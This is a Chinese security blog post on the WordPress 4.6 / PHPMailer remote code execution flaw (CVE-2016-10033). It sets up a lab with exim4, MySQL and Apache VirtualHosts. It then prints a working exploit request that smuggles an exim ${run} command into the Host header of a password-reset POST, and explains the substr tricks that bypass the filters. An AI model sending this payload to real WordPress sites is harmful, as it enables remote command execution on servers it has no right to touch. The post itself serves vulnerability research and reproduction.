WordPress远程代码执行环境构造和VirtualHost环境验证 Secer's Blog

当地时间5月3日（北京时间5月4日凌晨），WordPress被曝出存在严重的安全隐患。一则关于漏洞CVE-2016-10033的新程序验证被爆出。这是一个PHPMailer的漏洞，WordPress 4.6使用了存在该漏洞的PHPMailer，出于安全考虑，WordPress官方在4.7.1中更新了PHPMailer，解决了这个问题。但PHPMailer漏洞的原作者，又发现了一个针对PHPMailer在使用exim4 MTA时的利用方法。

文章目录

背景

新的程序验证也曝出也表示着WordPress 4.6版本均受影响。
rce 原始出处
这里面的核心点就是作者提供了可用的针对WordPress的利用方法，利用的攻击向量就是exim4 MTA.

环境搭建

本文作者直接用的Ubuntu 14.04，WordPress 4.6，其他都是通过apt-get安装搭建的环境。我看有童鞋通过docker这种方式来搭建环境，遇到的坑实在太多，可以参考下这个。简单示例下：
由于是利用的exim4 MTA的攻击向量，这在Ubuntu14.04是默认不存在的。

安装exim4

通过“apt-get install exim4”直接安装，安装完的效果如下：

bash
liaoxinxi@ubuntu:/var/www/WordPress-4.6$ ls -al /usr/sbin/sendmail
lrwxrwxrwx 1 root root 5 Jan  5 23:10 /usr/sbin/sendmail -> exim4
liaoxinxi@ubuntu:/var/www/WordPress-4.6$ sudo netstat -anp|grep ":25"
tcp        0      0 127.0.0.1:25            0.0.0.0:*               LISTEN      1683/exim4
tcp6       0      0 ::1:25                  :::*                    LISTEN      1683/exim4

bash

liaoxinxi@ubuntu:/var/www/WordPress-4.6$ ls -al /usr/sbin/sendmail

lrwxrwxrwx 1 root root 5 Jan 5 23:10 /usr/sbin/sendmail -> exim4

liaoxinxi@ubuntu:/var/www/WordPress-4.6$ sudo netstat -anp|grep ":25"

tcp 0 0 127.0.0.1:25 0.0.0.0:* LISTEN 1683/exim4

tcp6 0 0 ::1:25 :::* LISTEN 1683/exim4

apt-get安装完会在系统建立sendmail的软连接，这个软连接直接指向了exim4，当然也就不需要再安装sendmail了。安装完之后会在系统的25号端口建立监听。

安装Mysql，设置数据库

接下来就是wordpress的安装，这个网上的文章很多，看权威文档即可，下面是记录文档。
数据库的安装，本来系统有个mysql数据库，但是忘记root密码，试了好多遍，好吧，只能卸载了重装，这个卸载的一定得把数据清除了，不然root密码还是原来的。附安装脚本：

bash
1 sudo apt-get install mysql-server
2 sudo apt-get install mysql-client
3 sudo apt-get install  php5-mysqlnd-ms

bash

1 sudo apt-get install mysql-server

2 sudo apt-get install mysql-client

3 sudo apt-get install php5-mysqlnd-ms

在装数据库的时候会弹出让你填入root用户名和密码，直接写入就可以，记得后续得用到
创建数据库表：

bash
mysql> CREATE DATABASE wp_myblog;
mysql> GRANT ALL PRIVILEGES ON wp_myblog.* TO 'wordpress'@'localhost' IDENTIFIED BY 'wordpress';
mysql> FLUSH PRIVILEGES;
mysql> EXIT;

bash

mysql> CREATE DATABASE wp_myblog;

mysql> GRANT ALL PRIVILEGES ON wp_myblog.* TO 'wordpress'@'localhost' IDENTIFIED BY 'wordpress';

mysql> FLUSH PRIVILEGES;

mysql> EXIT;

配置Apache

解压WordPress的zip包到web目录，设置apache2配置文件。WordPress 4.6的下载地址：https://github.com/WordPress/WordPress/archive/4.6.zip，
apach2的简单配置如下,就是设置DocumentRoot指向刚才解压后WordPress的路径：

bash
vi /etc/apache2/sites-enabled/000-default.conf

 35 <VirtualHost *:80>
 36     # The ServerName directive sets the request scheme, hostname and port that
 37     # the server uses to identify itself. This is used when creating
 38     # redirection URLs. In the context of virtual hosts, the ServerName
 39     # specifies what hostname must appear in the request's Host: header to
 40     # match this virtual host. For the default virtual host (this file) this
 41     # value is not decisive as it is used as a last resort host regardless.
 42     # However, you must set it for any further virtual host explicitly.
 43     #ServerName www.example.com
 44     ServerName www.a.com
 46     DocumentRoot /var/www/WordPress-4.6/

bash

vi /etc/apache2/sites-enabled/000-default.conf

35 <VirtualHost *:80>

36 # The ServerName directive sets the request scheme, hostname and port that

37 # the server uses to identify itself. This is used when creating

38 # redirection URLs. In the context of virtual hosts, the ServerName

39 # specifies what hostname must appear in the request's Host: header to

40 # match this virtual host. For the default virtual host (this file) this

41 # value is not decisive as it is used as a last resort host regardless.

42 # However, you must set it for any further virtual host explicitly.

43 #ServerName www.example.com

44 ServerName www.a.com

46 DocumentRoot /var/www/WordPress-4.6/

配置WordPress wp-config

编辑wp-config.php，首先“sudo cp wp-config-sample.php wp-config.php”,修改如下：

23 define('DB_NAME', 'wp_myblog');
 24
 25 /** MySQL database username */
 26 define('DB_USER', 'wordpress');
 27
 28 /** MySQL database password */
 29 define('DB_PASSWORD', 'wordpress');

23 define('DB_NAME', 'wp_myblog');

25 /** MySQL database username */

26 define('DB_USER', 'wordpress');

28 /** MySQL database password */

29 define('DB_PASSWORD', 'wordpress');

重启进程

最后重启数据库，apache2

sudo /etc/init.d/apache2 restart
sudo/etc/init.d/mysql start

1 2	sudo /etc/init.d/apache2 restart sudo/etc/init.d/mysql start

重启完之后访问我们的设置的IP或者域名，按照提示一步步设置即可。

不过得记住具体设置的用户名或者email地址，这个在后续的程序验证中会用到。

VirtualHost 环境验证

在实际的应用中，很多时候都会用到VirtualHost来配置主机和域名的对应关系，在原作者的payload也提到了是利用了默认的Apache2配置，那么不是默认的Apache2配置呢？设置了ServerName的这种情况呢？经测试发现，不修改的话，直接访问该IP，Apache会将请求交给第一个VirtualHost处理。
那如果修改呢，笔者尝试修改完之后能达到访问任意VirtualHost环境，这就避免了原作者必须利用默认配置的情况，这样的话这个漏洞的威力又大了一成。下面附上设置的VirtualHost环境，大家可以尝试修改试试，这个针对带多个VirtualHost的程序验证暂时先不公布，大家可以先仔细测测,肯定是可以的，笔者的环境中WordPress即不在第一个VirtualHost上，也是能被攻击的。

bash
<VirtualHost *:80>
    ServerAdmin webmaster@localhost
    ServerName www.b.com
    DocumentRoot /var/www/DVWA-1.9
    ErrorLog ${APACHE_LOG_DIR}/error.log
    CustomLog ${APACHE_LOG_DIR}/access.log combined

</VirtualHost>
<VirtualHost *:80>
    ServerName www.a.com
    DocumentRoot /var/www/WordPress-4.6/
    ErrorLog ${APACHE_LOG_DIR}/error1.log
    CustomLog ${APACHE_LOG_DIR}/access1.log combined
</VirtualHost>

bash

ServerAdmin webmaster@localhost

ServerName www.b.com

DocumentRoot /var/www/DVWA-1.9

ErrorLog ${APACHE_LOG_DIR}/error.log

CustomLog ${APACHE_LOG_DIR}/access.log combined

</VirtualHost>

ServerName www.a.com

DocumentRoot /var/www/WordPress-4.6/

ErrorLog ${APACHE_LOG_DIR}/error1.log

CustomLog ${APACHE_LOG_DIR}/access1.log combined

</VirtualHost>

程序验证简单解读

这个解读会比较简单，大家可以参考原作者公布的blog,真是不得不服人家，写的有理有据，包括怎么发现的，参考的文档，怎么绕过的，一步步的绕过历程都写得清清楚，值得细读。

reqeust
POST /wp-login.php?action=lostpassword HTTP/1.1
Host: xenial(tmp1 -be ${run{${substr{0}{1}{$spool_directory}}usr${substr{0}{1}
{$spool_directory}}bin${substr{0}{1}{$spool_directory}}touch${substr{10}{1}{$tod_log}}$
{substr{0}{1}{$spool_directory}}tmp${substr{0}{1}{$spool_directory}}test}}  tmp2)
Content-Type: application/x-www-form-urlencoded
Content-Length: 64

user_login=wordpress&redirect_to=&wp-submit=Get+New+Password

reqeust

POST /wp-login.php?action=lostpassword HTTP/1.1

Host: xenial(tmp1 -be ${run{${substr{0}{1}{$spool_directory}}usr${substr{0}{1}

{$spool_directory}}bin${substr{0}{1}{$spool_directory}}touch${substr{10}{1}{$tod_log}}$

{substr{0}{1}{$spool_directory}}tmp${substr{0}{1}{$spool_directory}}test}} tmp2)

Content-Type: application/x-www-form-urlencoded

Content-Length: 64

user_login=wordpress&redirect_to=&wp-submit=Get+New+Password

response
HTTP/1.1 302 Found
Date: Thu, 04 May 2017 07:37:15 GMT
Server: Apache/2.4.7 (Ubuntu)
X-Powered-By: PHP/5.5.9-1ubuntu4.21
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Set-Cookie: wordpress_test_cookie=WP+Cookie+check; path=/
X-Frame-Options: SAMEORIGIN
Location: wp-login.php?checkemail=confirm
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

response

HTTP/1.1 302 Found

Date: Thu, 04 May 2017 07:37:15 GMT

Server: Apache/2.4.7 (Ubuntu)

X-Powered-By: PHP/5.5.9-1ubuntu4.21

Expires: Wed, 11 Jan 1984 05:00:00 GMT

Cache-Control: no-cache, must-revalidate, max-age=0

Set-Cookie: wordpress_test_cookie=WP+Cookie+check; path=/

X-Frame-Options: SAMEORIGIN

Location: wp-login.php?checkemail=confirm

Content-Length: 0

Connection: close

Content-Type: text/html; charset=UTF-8

原作者主要是利用了Host中可以包含注释来夹带私货，来绕过域名中不能包含空格的问题（注释中域名部分可带空格来分割sendmail的参数），在WordPress中filter_var/FILTER_VALIDATE_EMAIL中和PHPMailer library库中validateAddress(）都是参考的RFC 822，实现都是一样的。

一个简单的注释示例如“[email protected](comment)”,而且域名部分可以包含空格。这就可以将参数传递到sendmail的第五个，第六个参数。为了绕过不能/的问题，作者尝试了perl，base64/hex，最终选定了substr来提取exim4自带的默认参数，“${substr{0}{1}{$spool_directory}”`来替代用 “/”,${substr{10}{1}{$tod_log}} 来替代空格，这样就可以搞定一个命令执行。

其实exim中涉及的变量还挺多，还有些是可以利用的。“/usr/bin/touch /tmp/test”,对于上面提供的程序验证得注意user_login必须是存在的，这个也在文章中设置wordpress的时候提到过，可以是用户名或者邮箱,提供的不对的话会报用户不存在的错误。

如果您需要了解更多内容，可以
加入QQ群：570982169
直接询问：010-68438880